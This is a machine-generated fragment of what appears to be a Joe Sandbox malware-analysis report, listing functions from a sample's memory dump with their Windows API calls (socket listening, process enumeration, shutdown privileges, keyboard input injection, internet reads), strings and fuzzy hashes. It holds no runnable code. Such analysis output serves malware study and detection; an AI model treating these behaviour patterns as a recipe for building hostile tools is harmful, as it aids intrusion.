                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00252609
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 713712311-438819550
                                                                                                                • Opcode ID: ecf4a6c0293c232c65af05388b37177d35e0c27f7f58a1154a02f903580e6191
                                                                                                                • Instruction ID: 7d3328de59d439d7171ce7eee9e027c878f7bfcacbf006961087177b651ed7ec
                                                                                                                • Opcode Fuzzy Hash: ecf4a6c0293c232c65af05388b37177d35e0c27f7f58a1154a02f903580e6191
                                                                                                                • Instruction Fuzzy Hash: 98417F7192021AEFCF14DFA4CC89AEEBBB8FF06311F100456E815A21D1E7319A68CF50
                                                                                                                Function 00208CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                • API String ID: 0-1546025612
                                                                                                                • Opcode ID: 69852b65829af3c1b1bade7dca1eff478893d2c9fe1e2fa29081ed7807723311
                                                                                                                • Instruction ID: 235bfc0d56afc94e0cd2308aa1df97babf8f8e52bef75d28f6179e7987819d66
                                                                                                                • Opcode Fuzzy Hash: 69852b65829af3c1b1bade7dca1eff478893d2c9fe1e2fa29081ed7807723311
                                                                                                                • Instruction Fuzzy Hash: 08928E75E2121ACBDF24DF58C8407ADB7B1BB54314F2481AAE85AA72C2D7709DE1CF60
                                                                                                                Function 00208530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 3ee82df2ff4c119329ca565f04b8a6ad967c5f7fa94259b51b5de7f07ca93d2a
                                                                                                                • Instruction ID: 2049808f5db2d148b4b077842183170c4bce5e000eb1510fb193240bb236c911
                                                                                                                • Opcode Fuzzy Hash: 3ee82df2ff4c119329ca565f04b8a6ad967c5f7fa94259b51b5de7f07ca93d2a
                                                                                                                • Instruction Fuzzy Hash: 5C129070A10609DFDF14DFA5D981AEEB3F5FF48300F208569E84AE7291EB35A924CB54
                                                                                                                Function 002482D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0023BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0023BF0F
                                                                                                                  • Part of subcall function 0023BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0023BF3C
                                                                                                                  • Part of subcall function 0023BEC3: GetLastError.KERNEL32 ref: 0023BF49
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 0024830C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                                                • API String ID: 2234035333-194228
                                                                                                                • Opcode ID: d456cc06a404a196cdb05226c950b4e67011a4f8013004cc88c9379de620bda0
                                                                                                                • Instruction ID: f841039df9588e1cc7445572d9f0123d3212f90d572d3d052e55ff027149ca3b
                                                                                                                • Opcode Fuzzy Hash: d456cc06a404a196cdb05226c950b4e67011a4f8013004cc88c9379de620bda0
                                                                                                                • Instruction Fuzzy Hash: 9801A771674312ABE76D6E789C4AFBF7B58DB05F80F140464FA43E60D2DEE09C2081A4
                                                                                                                Function 002591DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00259235
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00259244
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00259260
                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 0025926F
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00259289
                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 0025929D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279440585-0
                                                                                                                • Opcode ID: cafe2ad9bf6db5d562cbbcb9494e43ead5ac25d37de1472c1f1158e1cf5f610d
                                                                                                                • Instruction ID: e162d4f56b28f4d3d0dafa75ba294aea79e50d8ec6005b20725e8ba68b411f9f
                                                                                                                • Opcode Fuzzy Hash: cafe2ad9bf6db5d562cbbcb9494e43ead5ac25d37de1472c1f1158e1cf5f610d
                                                                                                                • Instruction Fuzzy Hash: 9321DB39610200EFCB10EF64D889B6EB7A9EF44321F148119FD56EB2D2CB70AD99CB51
                                                                                                                Function 00246F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00246F7D
                                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00246F8D
                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00246FAC
                                                                                                                • __wsplitpath.LIBCMT ref: 00246FD0
                                                                                                                • _wcscat.LIBCMT ref: 00246FE3
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00247022
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                • String ID:
                                                                                                                • API String ID: 1605983538-0
                                                                                                                • Opcode ID: e5402966e81cb2b126495a1e0161c1ee1c5d0449e6d0ad825e493d207f43712b
                                                                                                                • Instruction ID: d9151cbd147e1eb44c9bcf92ae620c2980801fff9ececfeb757d4639d24635a0
                                                                                                                • Opcode Fuzzy Hash: e5402966e81cb2b126495a1e0161c1ee1c5d0449e6d0ad825e493d207f43712b
                                                                                                                • Instruction Fuzzy Hash: 52217F71915219ABDB15AFA0DC88BEAB7BCAB09300F1004A5E505E3141E7729F98CB60
                                                                                                                Function 00206670 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1093COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: hN+$tM+
                                                                                                                • API String ID: 4104443479-867538968
                                                                                                                • Opcode ID: 0a622c9c0f3bcec4badd37ccf7c9da50ff0722e14248cdec851b5d623a206bb9
                                                                                                                • Instruction ID: 7f1f019947998598f04c2cd9d1f7bbb7b8959c5fad92bbf2021b4d26228d47a5
                                                                                                                • Opcode Fuzzy Hash: 0a622c9c0f3bcec4badd37ccf7c9da50ff0722e14248cdec851b5d623a206bb9
                                                                                                                • Instruction Fuzzy Hash: 2EA28B74E2121ACFCB24DF58C4846ADBBB1FF48314F258169E819AB391D770ADA5CF50
                                                                                                                Function 0020A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0022010A: std::exception::exception.LIBCMT ref: 0022013E
                                                                                                                  • Part of subcall function 0022010A: __CxxThrowException@8.LIBCMT ref: 00220153
                                                                                                                • _memmove.LIBCMT ref: 00273020
                                                                                                                • _memmove.LIBCMT ref: 00273135
                                                                                                                • _memmove.LIBCMT ref: 002731DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1300846289-0
                                                                                                                • Opcode ID: 2a006c69253e33636f40ab70aedaee15f1a4090c8e0c25d874d8984e8aee7eb7
                                                                                                                • Instruction ID: 955790cf21f4e0c53cba246765a29f3734818934cacd618b4bcff9b67ff17c40
                                                                                                                • Opcode Fuzzy Hash: 2a006c69253e33636f40ab70aedaee15f1a4090c8e0c25d874d8984e8aee7eb7
                                                                                                                • Instruction Fuzzy Hash: C0029270A20205DFCF04DF64D981AAEB7F5EF48300F54C069E80ADB296EB35DA65DB91
                                                                                                                Function 002596E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0025ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0025ACF5
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0025973D
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00259760
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 4170576061-0
                                                                                                                • Opcode ID: 57093911b0593c6b341f2390db383e41f4ab6d4f5ba61828f9ecd91962f72ad7
                                                                                                                • Instruction ID: 505a03868656f74cd350834690233c2b464362d43dd1fea7f872fe5aa49e40ed
                                                                                                                • Opcode Fuzzy Hash: 57093911b0593c6b341f2390db383e41f4ab6d4f5ba61828f9ecd91962f72ad7
                                                                                                                • Instruction Fuzzy Hash: F941D574620200AFDB14AF24CC86E7EB7EDDF44724F548049F956AB3D2CA74AD618B91
                                                                                                                Function 0024F350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0024F37A
                                                                                                                • _wcscmp.LIBCMT ref: 0024F3AA
                                                                                                                • _wcscmp.LIBCMT ref: 0024F3BF
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0024F3D0
                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0024F3FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 2387731787-0
                                                                                                                • Opcode ID: 764f79ca06a7c7417af6d41b26902bc6d7b9fc14c8a720e01e164899395aa17d
                                                                                                                • Instruction ID: 9351305ab98fff1890a86d122814ff9924c071d1dcdeb43c40fce2c7c28dfc3f
                                                                                                                • Opcode Fuzzy Hash: 764f79ca06a7c7417af6d41b26902bc6d7b9fc14c8a720e01e164899395aa17d
                                                                                                                • Instruction Fuzzy Hash: 2C41CB35610302DFC708DF28C490A9AB3E4FF89324F10416DEA5ACB3A2DB71A965CF90
                                                                                                                Function 00267F0E Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                • String ID:
                                                                                                                • API String ID: 292994002-0
                                                                                                                • Opcode ID: ac603c20dd9498a5d6eccc1d912e5dee41ebe65d6985f00c020a30160b40e6c4
                                                                                                                • Instruction ID: 9a3410a0225aafcca6c7dba7dc3582c5dcde0a34f498b30252d5d8d908f39ed6
                                                                                                                • Opcode Fuzzy Hash: ac603c20dd9498a5d6eccc1d912e5dee41ebe65d6985f00c020a30160b40e6c4
                                                                                                                • Instruction Fuzzy Hash: E9110435324212ABE7201F26BC44E2A7BD9EF54728B000028F806C3181DB34DDA18AA0
                                                                                                                Function 002620F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,002620EC,?,002622E0), ref: 00262104
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00262116
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetProcessId$kernel32.dll
                                                                                                                • API String ID: 2574300362-399901964
                                                                                                                • Opcode ID: 3c73ce574d674648b49690be02efb4cce8c0592b88054b59a7ce96f9892c14cd
                                                                                                                • Instruction ID: d486d81189c80df786142a53f618c078c1b8f5ad4959a0a5b2d45f2442fabbd7
                                                                                                                • Opcode Fuzzy Hash: 3c73ce574d674648b49690be02efb4cce8c0592b88054b59a7ce96f9892c14cd
                                                                                                                • Instruction Fuzzy Hash: 74D0A738424B23DFD7306F61F84D64237D4AF05701B004459EA5DD1196D770C4D8CB10
                                                                                                                Function 00244342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 0024439C
                                                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 002443B8
                                                                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00244425
                                                                                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00244483
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: 1f62874ac3e9214a683e71cff362d68b30b6b4746f68c77e521e0f82b104f40e
                                                                                                                • Instruction ID: 83041a71bf5af90c21c6c36745ae83e246e31edbbaf9385e8fa45a02f9cdcb62
                                                                                                                • Opcode Fuzzy Hash: 1f62874ac3e9214a683e71cff362d68b30b6b4746f68c77e521e0f82b104f40e
                                                                                                                • Instruction Fuzzy Hash: A64148B0A20249AAEF38AF64D8087FDBFB5AB44311F04015AF481972C1C7B49DA4CB61
                                                                                                                Function 0024220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0024221E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen
                                                                                                                • String ID: ($|
                                                                                                                • API String ID: 1659193697-1631851259
                                                                                                                • Opcode ID: fde2d8f1de562bd9caf73981aadedfb4b1ffd4f6ce9c9699f85f9ca3eac20b51
                                                                                                                • Instruction ID: 465a0f8c3edf1694dce471dcebe18dad06a4fc0b6067d632149281613e7d9f79
                                                                                                                • Opcode Fuzzy Hash: fde2d8f1de562bd9caf73981aadedfb4b1ffd4f6ce9c9699f85f9ca3eac20b51
                                                                                                                • Instruction Fuzzy Hash: FB320475A10605DFC728CF6AC480A6AB7F1FF48320B55C46EE89ADB3A1E770E951CB44
                                                                                                                Function 0021AD5C Relevance: 4.9, APIs: 3, Instructions: 378COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 0021AE5E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3265722593-0
                                                                                                                • Opcode ID: dfdfa9de4cacddecd83633794363728d901b4c966fa01e4276e1fc52b812d0c2
                                                                                                                • Instruction ID: ce02dd21545eb7befe7c2c3b64b2810a36362fd26bff45ffafe70a8f106f0ea6
                                                                                                                • Opcode Fuzzy Hash: dfdfa9de4cacddecd83633794363728d901b4c966fa01e4276e1fc52b812d0c2
                                                                                                                • Instruction Fuzzy Hash: 19A18B6403A202BADF28AF285D99DFF39DDEB62340B108139F506D2193C965CCF196B3
                                                                                                                Function 0025550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00254A1E,00000000), ref: 002555FD
                                                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00255629
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
